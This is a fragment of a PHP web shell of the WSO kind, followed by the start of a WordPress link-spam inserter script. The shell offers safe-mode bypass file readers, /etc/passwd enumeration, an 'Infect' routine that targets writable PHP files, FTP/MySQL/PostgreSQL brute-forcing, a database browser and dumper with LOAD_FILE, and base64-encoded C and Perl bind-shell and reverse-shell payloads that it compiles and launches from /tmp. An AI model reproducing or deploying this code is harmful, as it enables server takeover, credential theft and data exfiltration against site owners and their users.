                        if(@copy("compress.zlib://".$_POST['p2'], $temp)){
                                echo @file_get_contents($temp);
                                unlink($temp);
                        } else
                                echo 'Sorry... Can\'t open file';
                        break;
                case 2:
                        $files = glob($_POST['p2'].'*');
                        if( is_array($files) )
                                foreach ($files as $filename)
                                        echo $filename."\n";
                        break;
                case 3:
                        $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
                        curl_exec($ch);
                        break;
                case 4:
                        ini_restore("safe_mode");
                        ini_restore("open_basedir");
                        include($_POST['p2']);
                        break;
                case 5:
                        for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                                $uid = @posix_getpwuid($_POST['p2']);
                                if ($uid)
                                        echo join(':',$uid)."\n";
                        }
                        break;
                case 6:
                        if(!function_exists('imap_open'))break;
                        $stream = imap_open($_POST['p2'], "", "");
                        if ($stream == FALSE)
                                break;
                        echo imap_body($stream, 1);
                        imap_close($stream);
                        break;
        }
        $temp = ob_get_clean();
        hardHeader();
        echo '<h1>Safe mode bypass</h1><div class=content>';
        echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
        if($temp)
                echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
        echo '</div>';
        hardFooter();
}
function actionLogout() {
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
        die('bye!');
}
function actionSelfRemove() {
        if($_POST['p1'] == 'yes')
                if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
                        die('Shell has been removed');
                else
                        echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        hardHeader();
        echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
        hardFooter();
}
function actionInfect() {
        hardHeader();
        echo '<h1>Infect</h1><div class=content>';
        if($_POST['p1'] == 'infect') {
                $target=$_SERVER['DOCUMENT_ROOT'];
                        function ListFiles($dir) {
                                if($dh = opendir($dir)) {
                                        $files = Array();
                                        $inner_files = Array();
                                        while($file = readdir($dh)) {
                                                if($file != "." && $file != "..") {
                                                        if(is_dir($dir . "/" . $file)) {
                                                                $inner_files = ListFiles($dir . "/" . $file);
                                                                if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                                                        } else {
                                                                array_push($files, $dir . "/" . $file);
                                                        }
                                                }
                                        }
                                        closedir($dh);
                                        return $files;
                                }
                        }
                        foreach (ListFiles($target) as $key=>$file){
                                $nFile = substr($file, -4, 4);
                                if($nFile == ".php" ){
                                        if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
                                                echo "$file<br>";
                                                $i++;
                                        }
                                }
                        }
                        echo "<font color=red size=14>$i</font>";
                }else{
                        echo "<form method=post><input type=submit value=Infect name=infet></form>";
                        echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
                }
        hardFooter();
}
function actionBruteforce() {
        hardHeader();
        if( isset($_POST['proto']) ) {
                echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
                if( $_POST['proto'] == 'ftp' ) {
                        function bruteForce($ip,$port,$login,$pass) {
                                $fp = @ftp_connect($ip, $port?$port:21);
                                if(!$fp) return false;
                                $res = @ftp_login($fp, $login, $pass);
                                @ftp_close($fp);
                                return $res;
                        }
                } elseif( $_POST['proto'] == 'mysql' ) {
                        function bruteForce($ip,$port,$login,$pass) {
                                $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
                                @mysql_close($res);
                                return $res;
                        }
                } elseif( $_POST['proto'] == 'pgsql' ) {
                        function bruteForce($ip,$port,$login,$pass) {
                                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
                                $res = @pg_connect($str);
                                @pg_close($res);
                                return $res;
                        }
                }
                $success = 0;
                $attempts = 0;
                $server = explode(":", $_POST['server']);
                if($_POST['type'] == 1) {
                        $temp = @file('/etc/passwd');
                        if( is_array($temp) )
                                foreach($temp as $line) {
                                        $line = explode(":", $line);
                                        ++$attempts;
                                        if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                                                $success++;
                                                echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                                        }
                                        if(@$_POST['reverse']) {
                                                $tmp = "";
                                                for($i=strlen($line[0])-1; $i>=0; --$i)
                                                        $tmp .= $line[0][$i];
                                                ++$attempts;
                                                if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                                                        $success++;
                                                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                                                }
                                        }
                                }
                } elseif($_POST['type'] == 2) {
                        $temp = @file($_POST['dict']);
                        if( is_array($temp) )
                                foreach($temp as $line) {
                                        $line = trim($line);
                                        ++$attempts;
                                        if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                                                $success++;
                                                echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                                        }
                                }
                }
                echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
        }
        echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
                .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
                .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
                .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
                .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
                .'<input type=hidden name=ne  value="">'
                .'<span>Server:port</span></td>'
                .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
                .'<tr><td><span>Brute type</span></td>'
                .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
                .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
                .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
                .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
                .'<td><input type=text name=login value="root"></td></tr>'
                .'<tr><td><span>Dictionary</span></td>'
                .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
                .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
        echo '</div><br>';
        hardFooter();
}
function actionSql() {
        class DbClass {
                var $type;
                var $link;
                var $res;
                function DbClass($type) {
                        $this->type = $type;
                }
                function connect($host, $user, $pass, $dbname){
                        switch($this->type)     {
                                case 'mysql':
                                        if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                                        break;
                                case 'pgsql':
                                        $host = explode(':', $host);
                                        if(!$host[1]) $host[1]=5432;
                                        if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                                        break;
                        }
                        return false;
                }
                function selectdb($db) {
                        switch($this->type)     {
                                case 'mysql':
                                        if (@mysql_select_db($db))return true;
                                        break;
                        }
                        return false;
                }
                function query($str) {
                        switch($this->type) {
                                case 'mysql':
                                        return $this->res = @mysql_query($str);
                                        break;
                                case 'pgsql':
                                        return $this->res = @pg_query($this->link,$str);
                                        break;
                        }
                        return false;
                }
                function fetch() {
                        $res = func_num_args()?func_get_arg(0):$this->res;
                        switch($this->type)     {
                                case 'mysql':
                                        return @mysql_fetch_assoc($res);
                                        break;
                                case 'pgsql':
                                        return @pg_fetch_assoc($res);
                                        break;
                        }
                        return false;
                }
                function listDbs() {
                        switch($this->type)     {
                                case 'mysql':
                        return $this->query("SHOW databases");
                                break;
                                case 'pgsql':
                                        return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
                                break;
                        }
                        return false;
                }
                function listTables() {
                        switch($this->type)     {
                                case 'mysql':
                                        return $this->res = $this->query('SHOW TABLES');
                                break;
                                case 'pgsql':
                                        return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
                                break;
                        }
                        return false;
                }
                function error() {
                        switch($this->type)     {
                                case 'mysql':
                                        return @mysql_error();
                                break;
                                case 'pgsql':
                                        return @pg_last_error();
                                break;
                        }
                        return false;
                }
                function setCharset($str) {
                        switch($this->type)     {
                                case 'mysql':
                                        if(function_exists('mysql_set_charset'))
                                                return @mysql_set_charset($str, $this->link);
                                        else
                                                $this->query('SET CHARSET '.$str);
                                        break;
                                case 'pgsql':
                                        return @pg_set_client_encoding($this->link, $str);
                                        break;
                        }
                        return false;
                }
                function loadFile($str) {
                        switch($this->type)     {
                                case 'mysql':
                                        return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
                                break;
                                case 'pgsql':
                                        $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");
                                        $r=array();
                                        while($i=$this->fetch())
                                                $r[] = $i['file'];
                                        $this->query('drop table hard2');
                                        return array('file'=>implode("\n",$r));
                                break;
                        }
                        return false;
                }
                function dump($table, $fp = false) {
                        switch($this->type)     {
                                case 'mysql':
                                        $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
                                        $create = mysql_fetch_array($res);
                                        $sql = $create[1].";\n";
                    if($fp) fwrite($fp, $sql); else echo($sql);
                                        $this->query('SELECT * FROM `'.$table.'`');
                    $i = 0;
                    $head = true;
                                        while($â = $this->fetch()) {
                        $sql = '';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = ";\n\n";
                        }
                                                $columns = array();
                                                foreach($â as $k=>$v) {
                            if($v === null)
                                $â[$k] = "NULL";
                            elseif(is_int($v))
                                $â[$k] = $v;
                            else
                                $â[$k] = "'".@mysql_real_escape_string($v)."'";
                                                        $columns[] = "`".$k."`";
                                                }
                        if($head) {
                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')';
                            $head = false;
                        } else
                            $sql .= "\n\t,(".implode(", ", $â).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
                                        }
                    if(!$head)
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
                                break;
                                case 'pgsql':
                                        $this->query('SELECT * FROM '.$table);
                                        while($â = $this->fetch()) {
                                                $columns = array();
                                                foreach($â as $k=>$v) {
                                                        $â[$k] = "'".addslashes($v)."'";
                                                        $columns[] = $k;
                                                }
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n";
                        if($fp) fwrite($fp, $sql); else echo($sql);
                                        }
                                break;
                        }
                        return false;
                }
        };
        $db = new DbClass($_POST['type']);
        if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
                $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
                $db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
                                $db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
        }
        hardHeader();
        echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
        $tmp = "<input type=text name=sql_base value=''>";
        if(isset($_POST['sql_host'])){
                if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
                        switch($_POST['charset']) {
                                case "Windows-1251": $db->setCharset('cp1251'); break;
                                case "UTF-8": $db->setCharset('utf8'); break;
                                case "KOI8-R": $db->setCharset('koi8r'); break;
                                case "KOI8-U": $db->setCharset('koi8u'); break;
                                case "cp866": $db->setCharset('cp866'); break;
                        }
                        $db->listDbs();
                        echo "<select name=sql_base><option value=''></option>";
                        while($â = $db->fetch()) {
                                list($key, $value) = each($â);
                                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
                        }
                        echo '</select>';
                }
                else echo $tmp;
        }else
                echo $tmp;
        echo "</td>
                                <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
                        </tr>
                </table>
                <script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
                        function st(t,l) {
                                d.sf.p1.value = 'select';
                                d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
                                d.sf.submit();
                        }
                        function is() {
                                for(i=0;i<d.sf.elements['tbl[]'].length;++i)
                                        d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
                        }
                </script>";
        if(isset($db) && $db->link){
                echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
                        if(!empty($_POST['sql_base'])){
                                $db->selectdb($_POST['sql_base']);
                                echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
                                $tbls_res = $db->listTables();
                                while($â = $db->fetch($tbls_res)) {
                                        list($key, $value) = each($â);
                    if(!empty($_POST['sql_count']))
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
                                        $value = htmlspecialchars($value);
                                        echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
                                }
                                echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
                                if(@$_POST['p1'] == 'select') {
                                        $_POST['p1'] = 'query';
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
                                        $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
                                        $num = $db->fetch();
                                        $pages = ceil($num['n'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo " of $pages";
                    if($_POST['p3'] > 1)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                    if($_POST['p3'] < $pages)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                    $_POST['p3']--;
                                        if($_POST['type']=='pgsql')
                                                $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
                                        else
                                                $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                                        echo "<br><br>";
                                }
                                if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
                                        $db->query(@$_POST['p2']);
                                        if($db->res !== false) {
                                                $title = false;
                                                echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
                                                $line = 1;
                                                while($â = $db->fetch())        {
                                                        if(!$title)     {
                                                                echo '<tr>';
                                                                foreach($â as $key => $value)
                                                                        echo '<th>'.$key.'</th>';
                                                                reset($â);
                                                                $title=true;
                                                                echo '</tr><tr>';
                                                                $line = 2;
                                                        }
                                                        echo '<tr class="l'.$line.'">';
                                                        $line = $line==1?2:1;
                                                        foreach($â as $key => $value) {
                                                                if($value == null)
                                                                        echo '<td><i>null</i></td>';
                                                                else
                                                                        echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
                                                        }
                                                        echo '</tr>';
                                                }
                                                echo '</table>';
                                        } else {
                                                echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
                                        }
                                }
                                echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo htmlspecialchars($_POST['p2']);
                echo "</textarea><br/><input type=submit value='Execute'>";
                                echo "</td></tr>";
                        }
                        echo "</table></form><br/>";
            if($_POST['type']=='mysql') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if($db->fetch())
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            }
                        if(@$_POST['p1'] == 'loadfile') {
                                $file = $db->loadFile($_POST['p2']);
                                echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
                        }
        } else {
        echo htmlspecialchars($db->error());
    }
        echo '</div>';
        hardFooter();
}
function actionNetwork() {
        hardHeader();
        $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
        $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
        $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
        $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
        echo "<h1>Network tools</h1><div class=content>
        <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
        <span>Bind port to /bin/sh</span><br/>
        Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'>
        </form>
        <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
        <span>Back-connect to</span><br/>
        Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'>
        </form><br>";
        if(isset($_POST['p1'])) {
                function cf($f,$t) {
                        $w=@fopen($f,"w") or @function_exists('file_put_contents');
                        if($w)  {
                                @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
                                @fclose($w);
                        }
                }
                if($_POST['p1'] == 'bpc') {
                        cf("/tmp/bp.c",$bind_port_c);
                        $â = ex("gcc -o /tmp/bp /tmp/bp.c");
                        @unlink("/tmp/bp.c");
                        $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
                        echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>";
                }
                if($_POST['p1'] == 'bpp') {
                        cf("/tmp/bp.pl",$bind_port_p);
                        $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
                        echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>";
                }
                if($_POST['p1'] == 'bcc') {
                        cf("/tmp/bc.c",$back_connect_c);
                        $â = ex("gcc -o /tmp/bc /tmp/bc.c");
                        @unlink("/tmp/bc.c");
                        $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
                        echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>";
                }
                if($_POST['p1'] == 'bcp') {
                        cf("/tmp/bc.pl",$back_connect_p);
                        $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
                        echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>";
                }
        }
        echo '</div>';
        hardFooter();
}
if( empty($_POST['a']) )
        if(isset($â) && function_exists('action' . $â))
                $_POST['a'] = $â;
        else
                $_POST['a'] = 'FilesMan';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
        call_user_func('action' . $_POST['a']);
?>

at ttux199/wj39l.php

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>automatical inserter links to wordpress database</title>
<script>
function hide() {
        var obj = document.getElementById("message");
        obj.style.display = "none";
}
setTimeout(hide, 5000);
</script>
</head>
<body>
<?php
DEFINE('DBG', 0); DEFINE('SEP', ' | '); DEFINE('BR', '<BR>'.PHP_EOL); DEFINE('NPOST', 4); DEFINE('LOG_EXT', '.log'); DEFINE('PROC_LOG', 'process'); DEFINE('CON_LOG', 'connect'); DEFINE('REV_LOG', 'reverse'); DEFINE('LIST_DB', 'pass.txt'); DEFINE('ARCH', $_SERVER['SERVER_NAME'].'.tar.gz'); ini_set("display_errors","1"); ini_set("display_startup_errors","1"); ini_set("memory_limit","1000M"); @set_time_limit ( 0 ); @ini_set ( 'max_execution_time', 0 ); $params = array(); $params['pswd'] = "pass"; $params['links'] = "links"; $logs = array(); $logs['connect'] = CON_LOG; $logs['process'] = PROC_LOG; $logs['reverse'] = REV_LOG; echo "<div id=\"message\">"; echo checkInstall($params, "txt"); echo checkInstall($logs, "log"); echo "</div>"; ?>
<h1>Actions</h1>
<form action="<?=$_SERVER['SCRIPT_NAME'] ?>">
        <input type="radio" name="flink" value="links_txt" >links.txt
        <input type="radio" name="flink" value="links1_txt">links1.txt
        <input type="hidden" name="a" value="post" />
        <input type="submit" value="post links">
</form>
 
